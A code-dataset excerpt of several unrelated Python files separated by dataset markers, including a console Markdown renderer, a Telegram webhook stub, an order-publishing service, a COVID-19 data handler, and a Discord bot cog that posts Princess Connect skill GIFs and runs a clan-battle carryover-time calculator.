from django.contrib.auth import get_user_model
admin.site.register(get_user_model(), UserAdmin)
|
StarcoderdataPython
|
5044258
|
<filename>model/contact.py<gh_stars>0
class Contact:
def __init__(self, first_name, last_name, nick, home_phone, mobile_phone, email):
self.first_name = first_name
self.last_name = last_name
self.nick = nick
self.home_phone = home_phone
self.mobile_phone = mobile_phone
self.email = email
|
StarcoderdataPython
|
1632082
|
<reponame>deepestML/Discord-S.C.U.M<gh_stars>100-1000
import time, datetime
def calculateNonce(date="now"):
if date == "now":
date = datetime.datetime.now()
unixts = time.mktime(date.timetuple())
return str((int(unixts)*1000-1420070400000)*4194304)
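# Note on the arithmetic above: this builds a Discord snowflake ID.
# int(unixts)*1000 converts seconds to milliseconds, 1420070400000 is the
# Discord epoch (2015-01-01 UTC) in milliseconds, and multiplying by
# 4194304 (2**22) shifts the timestamp into the snowflake's upper bits,
# leaving the worker/process/increment bits at zero.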
|
StarcoderdataPython
|
4886764
|
import sys
import re
import textwrap
import commonmark
import pygments
import pygments.lexers
import pygments.styles
import pygments.formatters
from .styler import Styler, Style
from .escapeseq import EscapeSequence, _true_color
import logging
logger = logging.getLogger('consolemd')
endl = '\n'
def debug_tag(obj, entering, match):
if entering != match:
return ''
if entering:
return u"<{}>".format(obj.t)
return u"</{}>".format(obj.t)
class Renderer:
def __init__(self, parser=None, style_name=None):
if parser is None:
parser = commonmark.Parser()
if style_name is None:
style_name = 'native'
self.parser = parser
self.style_name = style_name
self.list_level = -1
self.counters = {}
self.footnotes = []
def render(self, text, **kw):
stream = kw.get('output', sys.stdout)
self.width = kw.get('width', None)
self.soft_wrap = kw.get('soft_wrap', True)
self.soft_wrap_char = endl if self.soft_wrap else ' '
text = self.wrap_paragraphs(text)
self.styler = Styler(stream, self.style_name)
ast = self.parser.parse(text)
for obj, entering in ast.walker():
with self.styler.cm(obj, entering):
prefix = self.prefix(obj, entering)
stream.write(prefix)
logger.debug(debug_tag(obj, entering, True))
out = self.dispatch(obj, entering)
stream.write(out)
logger.debug(debug_tag(obj, entering, False))
stream.flush()
def dispatch(self, obj, entering):
try:
handler = getattr(self, obj.t)
out = handler(obj, entering)
return out
except AttributeError:
logger.error(u"unhandled ast type: {}".format(obj.t))
return ''
def wrap_paragraphs(self, text):
"""
unfortunately textwrap expects to work on paragraphs, not entire
documents. If the user has specified a width then we need to wrap
the paragraphs individually before we parse the document.
"""
if not self.width:
return text
para_edge = re.compile(r"(\n\s*\n)", re.MULTILINE)
paragraphs = para_edge.split(text)
wrapped_lines = []
for para in paragraphs:
wrapped_lines.append(
textwrap.fill(para, width=self.width)
)
return '\n'.join(wrapped_lines)
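    # For example, with width=10 the text "aaa bbb ccc\n\nddd" splits into
    # ["aaa bbb ccc", "\n\n", "ddd"]; textwrap.fill() turns the first chunk
    # into "aaa bbb\nccc" and the whitespace-only separator into "", so the
    # final join preserves the blank line between paragraphs.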
def prefix(self, obj, entering):
"""
having newlines before text blocks is problematic, this function
tries to catch those corner cases
"""
if not entering:
return ''
if obj.t == 'document':
return ''
# if our parent is the document the prefix a newline
if obj.parent.t == 'document':
# don't prefix the very first one though
if obj.parent.first_child != obj:
return endl
return ''
def document(self, obj, entering):
if entering:
return ''
else:
formatted_footnotes = []
for i, footnote in enumerate(self.footnotes):
i += 1
f = u"[{}] - {}".format(i, footnote)
formatted_footnotes.append(f)
if formatted_footnotes:
return endl + endl.join(formatted_footnotes) + endl
return ''
def paragraph(self, obj, entering):
if entering:
return ''
else:
return endl
def text(self, obj, entering):
return obj.literal
def linebreak(self, obj, entering):
return endl
def softbreak(self, obj, entering):
return self.soft_wrap_char
def thematic_break(self, obj, entering):
width = self.width if self.width else 75
return u"{}".format('—' * width) + endl
def emph(self, obj, entering):
return ''
def strong(self, obj, entering):
return ''
def heading(self, obj, entering):
if entering:
level = 1 if obj.level is None else obj.level
return u"{} ".format('#' * level)
else:
return endl
def list(self, obj, entering):
if entering:
self.list_level += 1
else:
self.list_level -= 1
if obj.list_data['type'] == 'ordered':
if entering:
# item nodes will increment this
start = obj.list_data['start'] - 1
self.counters[ tuple(obj.sourcepos[0]) ] = start
else:
del self.counters[ tuple(obj.sourcepos[0]) ]
return ''
def item(self, obj, entering):
if entering:
if obj.list_data['type'] == 'ordered':
key = tuple(obj.parent.sourcepos[0])
self.counters[key] += 1
num = self.counters[key]
bullet_char = u"{}.".format(num)
else:
bullet_char = obj.list_data.get('bullet_char') or '*' # -,+,*
text = u"{}{} ".format(' ' * self.list_level * 2, bullet_char)
eseq = self.styler.style.entering('bullet')
return self.styler.stylize(eseq, text)
return ''
def code(self, obj, entering):
# backticks
return obj.literal
def code_block(self, obj, entering):
# farm out code highlighting to pygments
# note: unfortunately you can't set your own background color
# because after the first token the color codes would get reset
try:
lang = obj.info or 'text'
lexer = pygments.lexers.get_lexer_by_name(lang)
style = Style.get_style_by_name(self.style_name)
except pygments.util.ClassNotFound: # lang is unknown to pygments
lang = 'text'
lexer = pygments.lexers.get_lexer_by_name(lang)
style = Style.get_style_by_name(self.style_name)
formatter_name = 'console16m' if _true_color else 'console'
formatter = pygments.formatters.get_formatter_by_name(formatter_name, style=style)
highlighted = u"{}{}".format(
pygments.highlight(obj.literal.encode('utf-8'), lexer, formatter).rstrip(),
EscapeSequence.full_reset_string() + endl,
)
eseq = EscapeSequence(bg="#202020")
return self.styler.stylize(eseq, highlighted)
def block_quote(self, obj, entering):
# has text children
return ''
def link(self, obj, entering):
if entering:
self.footnotes.append(obj.destination)
return ''
else:
return u"[{}]".format(len(self.footnotes))
def image(self, obj, entering):
if entering:
self.footnotes.append(obj.destination)
return '<image:'
else:
return u">[{}]".format(len(self.footnotes))
def html_inline(self, obj, entering):
if obj.literal.lower() in ['<br>', '<br/>']:
return endl
return obj.literal
    def html_block(self, obj, entering):
        # raw html blocks are not rendered; the commented lines below show
        # the previously attempted (and abandoned) recursive approach
        logger.warning("ignoring html_block")
        # renderer = Renderer(self.parser, self.style_name)
        # renderer.render(obj.literal[4:-3])
        return ''
|
StarcoderdataPython
|
11297943
|
import os
import asyncio
import aiohttp
from aiohttp import web
async def get_my_public_ip(client: aiohttp.ClientSession) -> str:
    # ipify returns a JSON body of the form {"ip": "<address>"}
    async with client.get('https://api.ipify.org/?format=json') as resp:
        return (await resp.json())['ip']
async def set_webhooks(base_url):
async with aiohttp.ClientSession() as client:
        my_public_ip = await get_my_public_ip(client)
with open('./YOURPUBLIC.pem') as cert_file:
async with client.post(f'{base_url}/setWebhook?url={my_public_ip}', data=cert_file) as resp:
return await resp.json()
def server(base_url):
async def handle_req(req):
print(await req.json())
return web.Response(status=200)
async def index(req):
print(await req.json())
return web.Response(status=200, text='test text')
app = web.Application()
app.add_routes([
        web.post('/', index),
web.post(f'/{base_url}/api/v1', handle_req)
])
web.run_app(app)
def main():
base_url = f'https://api.telegram.org/bot{os.environ["BOT_TOKEN"]}'
loop = asyncio.get_event_loop()
loop.run_until_complete(set_webhooks(base_url))
server(base_url)
if (__name__ == '__main__'):
main()
|
StarcoderdataPython
|
3371979
|
from datetime import datetime
from loguru import logger
from config import settings
from order.dao import ordermodel
from order.schemas.schemas_order import (
orderMessage,
orderPayload,
orderModelBrokerMessage,
orderModelCreate,
messageBaseResponse,
)
from order.api.adapters.user import get_user
from order.api.adapters.product import get_product
from order.api.adapters.publisher import publish_queue
class OrderService():
async def add_ordermodel(self, ordermodel_data):
try:
_order_message = await self._pub_message(
await ordermodel.create(
obj_in=await self._create_model_obj(ordermodel_data)
)
)
return _order_message
except Exception as e:
logger.error(f"Error in add ordermodel {e}")
raise e
@staticmethod
async def _create_model_obj(data):
try:
_user = await get_user(user_id=data.user_id)
_product = await get_product(product_code=data.product_code)
if not _user or not _product:
raise ValueError(f"User or Product not found.\n User {_user} - Product {_product}")
return orderModelCreate(
user_id=_user.user_id,
product_code=_product.product_code,
customer_fullname=_user.customer_fullname,
product_name=_product.product_name,
total_amount=_product.price
)
except Exception as e:
logger.error(f"Error in create_model_object {e}")
raise e
@staticmethod
async def _pub_message(message):
try:
_order_message = orderMessage(
order_id=message.id,
product_code=message.product_code,
customer_fullname=message.customer_fullname,
product_name=message.product_name,
total_amount=message.total_amount,
created_at=message.created_at
)
_order_payload = orderPayload(order=_order_message)
_order_broker_message = orderModelBrokerMessage(
producer="service-order",
sent_at=datetime.now(),
type="created-order",
payload=_order_payload,
)
_output = await publish_queue(
broker_queue=settings.BROKER_QUEUE_CREATE_ORDER,
broker_exchange=settings.BROKER_EXCHANGE_ORDERS,
body_queue=_order_broker_message.json().encode("utf-8")
)
if not hasattr(_output, "index"):
raise Exception("Order not queue")
return messageBaseResponse(
queue_index=_output.index,
order_id=message.id,
user_id=message.user_id,
product_code=message.product_code,
customer_fullname=message.customer_fullname,
product_name=message.product_name,
total_amount=message.total_amount,
created_at=message.created_at,
)
except Exception as e:
logger.error(f"Error in send message to broker {e}")
raise e
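# Illustrative shape of the broker message assembled above (field names taken
# from this module's schema usage; values are placeholders):
# {
#   "producer": "service-order",
#   "sent_at": "2021-01-01T12:00:00",
#   "type": "created-order",
#   "payload": {"order": {"order_id": 1, "product_code": "P001",
#                         "customer_fullname": "Jane Doe",
#                         "product_name": "Widget", "total_amount": 9.99,
#                         "created_at": "2021-01-01T12:00:00"}}
# }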
|
StarcoderdataPython
|
3301368
|
<reponame>rebeccadavidsson/covid19-sir
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import numpy as np
import pandas as pd
from covsirphy.util.error import NotInteractiveError
from covsirphy.util.plotting import line_plot
from covsirphy.cleaning.term import Term
from covsirphy.cleaning.jhu_data import JHUData
from covsirphy.cleaning.population import PopulationData
class DataHandler(Term):
"""
Data handler for scenario analysis.
Args:
jhu_data (covsirphy.JHUData): object of records
population_data (covsirphy.PopulationData): PopulationData object
country (str): country name
province (str or None): province name
auto_complement (bool): if True and necessary, the number of cases will be complemented
"""
def __init__(self, jhu_data, population_data, country, province=None, auto_complement=True):
# Population
population_data = self.ensure_instance(
population_data, PopulationData, name="population_data")
self.population = population_data.value(country, province=province)
# Records
self.jhu_data = self.ensure_instance(
jhu_data, JHUData, name="jhu_data")
# Area name
self.country = country
self.province = province or self.UNKNOWN
self.area = JHUData.area_name(country, province)
# Whether complement the number of cases or not
self._auto_complement = bool(auto_complement)
self._complemented = False
# Create {scenario_name: PhaseSeries} and set records
self.record_df = pd.DataFrame()
self._first_date = None
self._last_date = None
# Interactive (True) / script (False) mode
self._interactive = hasattr(sys, "ps1")
def init_records(self):
"""
Set records.
        When auto-complement mode is enabled, records are complemented if necessary.
"""
# Set records (complement records, if necessary)
self.record_df, self._complemented = self.jhu_data.records(
country=self.country, province=self.province,
start_date=self._first_date, end_date=self._last_date,
population=self.population,
auto_complement=self._auto_complement
)
# First/last date of the records
if self._first_date is None:
series = self.record_df.loc[:, self.DATE]
self._first_date = series.min().strftime(self.DATE_FORMAT)
self._last_date = series.max().strftime(self.DATE_FORMAT)
@property
def first_date(self):
"""
str: the first date of the records
"""
return self._first_date
@first_date.setter
def first_date(self, date):
self.ensure_date_order(self._first_date, date, name="date")
self.ensure_date_order(date, self._last_date, name="date")
self._first_date = date
self.init_records()
@property
def last_date(self):
"""
str: the last date of the records
"""
return self._last_date
@last_date.setter
def last_date(self, date):
self.ensure_date_order(self._first_date, date, name="date")
self.ensure_date_order(date, self._last_date, name="date")
self._last_date = date
self.init_records()
@property
def interactive(self):
"""
bool: interactive mode (display figures) or not
Note:
When running scripts, interactive mode cannot be selected.
"""
return self._interactive
@interactive.setter
def interactive(self, is_interactive):
if not hasattr(sys, "ps1") and is_interactive:
raise NotInteractiveError
self._interactive = hasattr(sys, "ps1") and bool(is_interactive)
def line_plot(self, df, show_figure=True, filename=None, **kwargs):
"""
Display or save a line plot of the dataframe.
Args:
show_figure (bool): whether show figure when interactive mode or not
filename (str or None): filename of the figure or None (not save) when script mode
Note:
When interactive mode and @show_figure is True, display the figure.
When script mode and filename is not None, save the figure.
When using interactive shell, we can change the modes by Scenario.interactive = True/False.
"""
if self._interactive and show_figure:
return line_plot(df=df, filename=None, **kwargs)
if not self._interactive and filename is not None:
return line_plot(df=df, filename=filename, **kwargs)
def complement(self, interval=2, max_ignored=100):
"""
Complement the number of recovered cases, if necessary.
Args:
interval (int): expected update interval of the number of recovered cases [days]
max_ignored (int): Max number of recovered cases to be ignored [cases]
Returns:
covsirphy.Scenario: self
"""
self.record_df, self._complemented = self.jhu_data.records(
country=self.country, province=self.province,
start_date=self._first_date, end_date=self._last_date,
population=self.population,
auto_complement=True, interval=interval, max_ignored=max_ignored
)
return self
def complement_reverse(self):
"""
Restore the raw records. Reverse method of covsirphy.Scenario.complement().
Returns:
covsirphy.Scenario: self
"""
self.record_df, self._complemented = self.jhu_data.records(
country=self.country, province=self.province,
start_date=self._first_date, end_date=self._last_date,
population=self.population,
auto_complement=False
)
return self
def show_complement(self, **kwargs):
"""
Show the details of complement that was (or will be) performed for the records.
Args:
kwargs: keyword arguments of JHUDataComplementHandler(), control factors of complement
Returns:
            pandas.DataFrame: the same as `JHUData.show_complement()`
"""
return self.jhu_data.show_complement(
country=self.country, province=self.province,
start_date=self._first_date, end_date=self._last_date, **kwargs)
def records(self, variables=None, **kwargs):
"""
Return the records as a dataframe.
Args:
show_figure (bool): if True, show the records as a line-plot.
variables (list[str] or None): variables to include, Infected/Fatal/Recovered when None
kwargs: the other keyword arguments of Scenario.line_plot()
Returns:
pandas.DataFrame
Index:
reset index
Columns:
- Date (pd.TimeStamp): Observation date
- Columns set by @variables (int)
Note:
- Records with Recovered > 0 will be selected.
- If complement was performed by Scenario.complement() or Scenario(auto_complement=True),
The kind of complement will be added to the title of the figure.
- @variables can be selected from Susceptible/Confirmed/Infected/Fatal/Recovered.
"""
variables = self.ensure_list(
variables or [self.CI, self.F, self.R],
candidates=[self.S, *self.VALUE_COLUMNS], name="variables")
df = self.record_df.loc[:, [self.DATE, *variables]]
if self._complemented:
title = f"{self.area}: Cases over time\nwith {self._complemented}"
else:
title = f"{self.area}: Cases over time"
self.line_plot(
df=df.set_index(self.DATE), title=title, y_integer=True, **kwargs)
return df
def records_diff(self, variables=None, window=7, **kwargs):
"""
Return the number of daily new cases (the first discreate difference of records).
Args:
variables (str or None): variables to show
window (int): window of moving average, >= 1
kwargs: the other keyword arguments of Scenario.line_plot()
Returns:
pandas.DataFrame
Index:
- Date (pd.TimeStamp): Observation date
Columns:
- Confirmed (int): daily new cases of Confirmed, if calculated
- Infected (int): daily new cases of Infected, if calculated
- Fatal (int): daily new cases of Fatal, if calculated
- Recovered (int): daily new cases of Recovered, if calculated
Note:
@variables will be selected from Confirmed, Infected, Fatal and Recovered.
If None was set as @variables, ["Confirmed", "Fatal", "Recovered"] will be used.
"""
variables = self.ensure_list(
variables or [self.C, self.F, self.R], candidates=self.VALUE_COLUMNS, name="variables")
window = self.ensure_natural_int(window, name="window")
df = self.record_df.set_index(self.DATE)[variables]
df = df.diff().dropna()
df = df.rolling(window=window).mean().dropna().astype(np.int64)
if self._complemented:
title = f"{self.area}: Daily new cases\nwith {self._complemented}"
else:
title = f"{self.area}: Daily new cases"
self.line_plot(df=df, title=title, y_integer=True, **kwargs)
return df
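# Hedged usage sketch using only this class's own API (the jhu_data and
# population_data objects are assumed to be prepared elsewhere):
#
#   handler = DataHandler(jhu_data, population_data, country="Japan")
#   handler.init_records()
#   daily = handler.records_diff(variables=["Confirmed"], window=7,
#                                show_figure=False)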
|
StarcoderdataPython
|
5178675
|
for i in range(129):
j = (1 << i)
print(i, (j-1).bit_length(), (j).bit_length(), (j+1).bit_length())
print(i, (-j-1).bit_length(), (-j).bit_length(), (-j+1).bit_length())
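# Expected pattern: (2**i - 1).bit_length() == i and (2**i).bit_length()
# == i + 1; bit_length() is defined on the absolute value, so the second
# print mirrors the first with -j-1 <-> j+1 and -j+1 <-> j-1 swapped.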
|
StarcoderdataPython
|
199499
|
<reponame>JuneMuoti/Hood-watch
from .models import User,Post
from django import forms
class ProfileForm(forms.ModelForm):
class Meta:
model = User
exclude = []
widgets = {}
class PostForm(forms.ModelForm):
class Meta:
model = Post
exclude = []
widgets = {}
class HoodForm(ProfileForm):
class Meta:
model=User
fields=[
'hood','user_id'
]
widgets={}
|
StarcoderdataPython
|
4843048
|
from discord.ext import commands
import asyncio
import random
import os
import math
import traceback
from datetime import datetime
from discord.ext import tasks
import threading
ID_role_1 = 767249291730747403
ID_role_2 = 767200011749949470
ID_role_3 = 767200106557865985
ID_role_tk = 767200196827676683
ID_clanmember = 666361330827132979
ID_readme = 768272323341320232
ID_role_test = 760094885364629524
prefix = '/'
token = os.environ['DISCORD_BOT_TOKEN']
# Princess Connect! Re:Dive characters
class SkillMotionGIF(commands.Cog, name = 'スキルモーション'):
def __init__(self, bot):
super().__init__()
self.bot = bot
@commands.command()
async def kurisu(self,ctx):
"""クリス"""
await ctx.send('https://gyazo.com/39f3bddc360ed09f20431c79d809e3fb')
await ctx.message.delete()
@commands.command()
async def mizumakoto(self,ctx):
"""マコト(サマー)"""
await ctx.send('https://i.gyazo.com/6e1c942142ce952e7b15c8f1aa6e6d73 \n 水が弾けたら')
await ctx.message.delete()
@commands.command()
async def makoto(self,ctx):
"""マコト"""
await ctx.send('https://i.gyazo.com/016e0804ce330f11c6fcf75a60f89277 \n 黄色の鳴き声が消えたら')
await ctx.message.delete()
@commands.command()
async def muimi(self,ctx):
"""ムイミ"""
await ctx.send('https://i.gyazo.com/016e0804ce330f11c6fcf75a60f89277 \n 左斜め後ろに飛んだ時')
await ctx.message.delete()
@commands.command()
async def tamaki(self,ctx):
"""タマキ"""
await ctx.send('https://i.gyazo.com/ede0b883427fbbe2dbd944d03f0d3030')
await ctx.message.delete()
@commands.command()
async def onon(self,ctx):
"""ニノン(オーエド)"""
await ctx.send('https://gyazo.com/9ef7490093e2ce4114fc33b49b68a9f9')
await ctx.message.delete()
@commands.command()
async def mizuna(self,ctx):
"""スズナ(サマー)"""
await ctx.send('https://i.gyazo.com/2b2c3b9dc2856a1d55d167bf920af87d')
await ctx.message.delete()
@commands.command()
async def neneka(self,ctx):
"""ネネカ"""
await ctx.send('https://i.gyazo.com/588cb732059044e1be0712694eadcffd')
await ctx.message.delete()
@commands.command()
async def puripeko(self,ctx):
"""ペコリーヌ(プリンセス)"""
await ctx.send('https://gyazo.com/0f0514e31d8b6136f87c33184b649b8d \n 切った後に剣を振り上げたタイミングでバフ付与')
await ctx.message.delete()
@commands.command()
async def mizukyaru(self,ctx):
"""キャル(サマー)"""
await ctx.send('https://i.gyazo.com/cf8625a0f3fbe7ce5a47f00e2305568a')
await ctx.message.delete()
@commands.command()
async def purikoro(self,ctx):
"""コッコロ(プリンセス)"""
await ctx.send('https://gyazo.com/04ffe3e6e434d79c816a837e435c1ff1')
await ctx.message.delete()
@commands.command()
async def harokyo(self,ctx):
"""キョウカ(ハロウィン)"""
await ctx.send('https://i.gyazo.com/60d59c64eb5c8a9443bd4de074cc03de \n 箒を突き刺した時/箒を振り終わった後')
await ctx.message.delete()
@commands.command()
async def mizusaren(self,ctx):
"""サレン(サマー)"""
await ctx.send('https://gyazo.com/c22d7996cb2d8e91ae7308b53c66d6d4 \n 右を向いた時')
await ctx.message.delete()
@commands.command()
async def nyukkoro(self,ctx):
"""コッコロ(ニューイヤー)"""
await ctx.send('https://gyazo.com/c29e006bf82ce2fb0e3b44c06405a9ce \n 左を向いた時')
await ctx.message.delete()
@commands.command()
async def haromimi(self,ctx):
"""ミミ(ハロウィン)"""
await ctx.send('https://i.gyazo.com/42f21611ee06890d48f4ffd4d38e6476 \n ぴょん ぴょん ぴょこ←ココ')
await ctx.message.delete()
@commands.command()
async def bazuru(self,ctx):
"""シズル(バレンタイン)"""
await ctx.send('https://i.gyazo.com/87b47efe83e874247b66519ce2caa78b')
await ctx.message.delete()
@commands.command()
async def kuritika(self,ctx):
"""チカ(クリスマス)"""
await ctx.send('https://i.gyazo.com/d9b5fcdfca2cac56f82cfd1c9feefd9d \n 足元に魔法陣が出たら/tp配布の数字を見る')
await ctx.message.delete()
@commands.command()
async def yuni(self,ctx):
"""ユニ"""
await ctx.send('https://gyazo.com/67a7c23623583779f069e697df22aa23 \n どちらもジャンプ着地時')
await ctx.message.delete()
@commands.command()
async def rei(self,ctx):
"""レイ"""
await ctx.send('https://i.gyazo.com/4dd4fbfc1687f4529e2f474a84c7a991')
await ctx.message.delete()
@commands.command()
async def suzuna(self,ctx):
"""スズナ"""
await ctx.send('https://gyazo.com/0f21de3dba9d6d69dee31ef7991b71fc')
await ctx.message.delete()
@commands.command()
async def an(self,ctx):
"""アン"""
await ctx.send('https://gyazo.com/4771ba5961617b5d66e8fe2aacdc3562')
await ctx.message.delete()
@commands.command()
async def misato(self,ctx):
"""ミサト"""
await ctx.send('https://gyazo.com/d759d75e36acd6942f1e20d5bf5654ba')
await ctx.message.delete()
@commands.command()
async def mizumaho(self,ctx):
"""マホ(サマー)"""
await ctx.send('https://gyazo.com/2848612666b463901e2960c0282685b5')
await ctx.message.delete()
@commands.command()
async def haromiso(self,ctx):
"""ミソギ(ハロウィン)"""
await ctx.send('https://gyazo.com/667afa5b86200885f706cd8cf65e7651')
await ctx.message.delete()
@commands.command()
async def hiyori(self,ctx):
"""ヒヨリ"""
await ctx.send('https://gyazo.com/0fceb161f3ddeb1807f048271416525f')
await ctx.message.delete()
@commands.command()
async def mizuhatsune(self,ctx):
"""ハツネ(サマー)"""
await ctx.send('https://gyazo.com/84891d66caf2de0092a9041020d9145e')
await ctx.message.delete()
@commands.command()
async def mizutama(self,ctx):
"""タマキ(サマー)"""
await ctx.send('https://gyazo.com/b83b2ad4e9e769321a66749da3a59466')
await ctx.message.delete()
@commands.command()
async def haromiya(self,ctx):
"""ミヤコ(ハロウィン)"""
await ctx.send('https://gyazo.com/f95a085630f753ee75f89bd666588484')
await ctx.message.delete()
@commands.command()
async def nyuyori(self,ctx):
"""ヒヨリ(ニューイヤー)"""
await ctx.send('https://gyazo.com/fc9f5b592ccfabd7a138977e6d97e774')
await ctx.message.delete()
@commands.command()
async def tieru(self,ctx):
"""チエル"""
await ctx.send('https://gyazo.com/828212c3cc6121942c37c8788425d5d2')
await ctx.message.delete()
@commands.command()
async def erogaki(self,ctx):
"""アカリ(エロガキ)"""
await ctx.send('https://gyazo.com/0fa628c9a38b842fb48ab404cc57f6b5 \n S1:着地で押す')
await ctx.message.delete()
@commands.command()
async def rabirisuta(self,ctx):
"""ラビリスタ"""
await ctx.send('https://i.gyazo.com/83468807130359544b8f7c987f5fabc3 \n https://i.gyazo.com/26bb2398837fb68c2fbd0bae128c88a7')
await ctx.message.delete()
@commands.command()
async def akino(self,ctx):
"""アキノ"""
await ctx.send('https://i.gyazo.com/095793437d33fce8cd982be40c0c39fa')
await ctx.message.delete()
class DamageCalc(commands.Cog, name = '持ち越し計算機'):
def __init__(self, bot):
super().__init__()
self.bot = bot
@commands.command()
async def motikosi(self,ctx, boss: int, p1: int, p2: int):
"""持越し時間計算機 /motikosi (凸時のボスHP) (先に抜ける人の与ダメ) (後に抜ける人の与ダメ)"""
total = p1 + p2
if total > boss and p1 < boss and p2 < boss:
cotime = 90 - (90*(boss-p1)/p2) + 20
text = "持ち越し時間は" + str(math.ceil(cotime)) + "秒です"
else:
text = "持ち越しは発生しません"
        sent = await ctx.send(text)
        await asyncio.sleep(10)
        await ctx.message.delete()
        await sent.delete()
    @commands.command()
    async def gyakusan(self,ctx, boss: int, p1: int):
        """Full-90-second calculator: /gyakusan (boss HP at the start of the attack) (damage of the player who leaves first)"""
if p1 < boss:
codamage = 9*(boss-p1)/2
text = str(math.ceil(codamage)) + "ダメージ以上なら90秒持ち越します"
else:
text = "持ち越しは発生しません"
        sent = await ctx.send(text)
        await asyncio.sleep(10)
        await ctx.message.delete()
        await sent.delete()
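# Quick sanity check of the carryover formula above (numbers are hypothetical):
# with boss HP 10000, the first player dealing 6000 and the second 7000,
# carryover = 90 - 90*(10000-6000)/7000 + 20 ≈ 58.6, reported as 59 seconds.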
class BestUrl(commands.Cog, name = 'みんなのおすすめ'):
def __init__(self, bot):
super().__init__()
self.bot = bot
@commands.command()
async def jantama(self,ctx):
"""じゃんたま公式HP"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://game.mahjongsoul.com/')
await ctx.message.delete()
@commands.command()
async def dbd(self,ctx):
"""DbDストアページ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://store.steampowered.com/app/381210/Dead_by_Daylight/')
await ctx.message.delete()
@commands.command()
async def pubg(self,ctx):
"""pubuストアページ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://store.steampowered.com/app/578080/PLAYERUNKNOWNS_BATTLEGROUNDS/')
await ctx.message.delete()
@commands.command()
async def avabox(self,ctx):
"""avaboxページ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://ava.pmang.jp/avabox/boxtop')
await ctx.message.delete()
@commands.command()
async def patora(self,ctx):
"""周防パトラ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://www.youtube.com/channel/UCeLzT-7b2PBcunJplmWtoDg \n https://twitter.com/Patra_HNST')
await ctx.message.delete()
@commands.command()
async def suzuhara(self,ctx):
"""鈴原るる"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://www.youtube.com/channel/UC_a1ZYZ8ZTXpjg9xUY9sj8w')
await ctx.message.delete()
@commands.command()
async def syaruru(self,ctx):
"""しゃるる"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://www.twitch.tv/syaruru3 \n https://www.youtube.com/channel/UC5SYDKMBeExdFs0ocWiK6xw')
await ctx.message.delete()
@commands.command()
async def pekorakopipe(self,ctx):
"""ぺこらコピペ"""
await ctx.send('ぺこーらいつもありがとう! \n 最近ぺこーらへ感謝するのが日課になりつつあります! \n 単刀直入に我慢してたこと書いちゃう! \n ぺこーら愛してるぞおおおお \n (ps.厄介野うさぎだと思われてそうですがが長文赤スパ失礼! \n ちなみに読まれてる頃にはあまりの恥ずかしさにユニバーサル大回転ぺこぺこの舞₍ ◝(‘ω’)◟ ⁾⁾₍₍ ◝(‘ω’)◜ ₎₎しながらベットの上で暴れてると思うので率直な一言貰ってもいいですか?w \n 最後に一言!配信をはじめ本当にいつもありがとう!!! \n 野うさぎ達を大切に思ってくれてる姿勢冗談抜きで本当に好きです。 \n 応援するしがいがあります!')
await ctx.message.delete()
@commands.command()
async def l4d2(self,ctx):
"""l4d2ストアページ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://store.steampowered.com/app/550/Left_4_Dead_2/')
await ctx.message.delete()
@commands.command()
async def kogatan(self,ctx):
"""月岡恋鐘フィギュア"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + '月岡恋鐘フィギュアが予約開始!予約はこちらから!↓↓↓ \n https://www.goodsmile.info/ja/product/9770/%E6%9C%88%E5%B2%A1%E6%81%8B%E9%90%98+%E3%83%95%E3%82%A7%E3%82%A4%E3%82%B9%E3%82%AA%E3%83%96%E3%83%88%E3%83%AC%E3%82%B8%E3%83%A3%E3%83%BCVer.html')
await ctx.message.delete()
@commands.command()
async def ow(self,ctx):
"""クソゲ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://playoverwatch.com/ja-jp/')
await ctx.message.delete()
@commands.command()
async def apex(self,ctx):
"""apex公式"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://www.ea.com/ja-jp/games/apex-legends')
await ctx.message.delete()
@commands.command()
async def kaya(self,ctx):
"""ドラゴンズエンドフィ.gif"""
await ctx.send('https://cdn.discordapp.com/attachments/620957812247363594/731102733188333600/nXasbmNiZdEOItOpeAYD1594378196-1594378480_1.gif')
await ctx.message.delete()
@commands.command()
async def nyaru(self,ctx):
"""ニューイヤーバースト"""
await ctx.send('https://cdn.discordapp.com/attachments/620957812247363594/731098724406919179/image0.gif')
await ctx.message.delete()
@commands.command()
async def bga(self,ctx):
"""ボードゲームアリーナ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://ja.boardgamearena.com/')
await ctx.message.delete()
@commands.command()
async def swb(self,ctx):
"""サマーウルフェンブリッツ.gif"""
await ctx.send('http://cdn.gameinn.jp/wp-content/uploads/imgs/2020/03/Dz5PPIn.gif')
await ctx.message.delete()
@commands.command()
async def yabaiwayo(self,ctx):
"""ヤバいわよ.gif"""
await ctx.send('https://img.animanch.com/2020/05/1588593715655.gif')
await ctx.message.delete()
@commands.command()
async def ron(self,ctx):
"""ケインコスギの物まね"""
await ctx.send('https://www.youtube.com/watch?v=ZX5ctEzgbpw')
await ctx.message.delete()
@commands.command()
async def tensura(self,ctx):
"""転スラwiki"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://ja.wikipedia.org/wiki/%E8%BB%A2%E7%94%9F%E3%81%97%E3%81%9F%E3%82%89%E3%82%B9%E3%83%A9%E3%82%A4%E3%83%A0%E3%81%A0%E3%81%A3%E3%81%9F%E4%BB%B6')
await ctx.message.delete()
@commands.command()
async def tinpokopon(self,ctx):
"""ちんぽこぽん"""
await ctx.send('https://cdn.discordapp.com/attachments/638718958819606549/749276683302862891/pokopon.gif')
await ctx.message.delete()
@commands.command()
async def supusi(self,ctx):
"""プリコネスプシ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://docs.google.com/spreadsheets/d/1nCdtFHS-60WcRZDx8hTXHFm3mPuEqefntQxeRfM2Lv0/edit#gid=632518118')
await ctx.message.delete()
@commands.command()
async def saru(self,ctx):
"""さるさんを呼び出す"""
saru = [
'https://img.huffingtonpost.com/asset/5c63b0b72000008b026e784d.jpeg?ops=scalefit_960_noupscale',
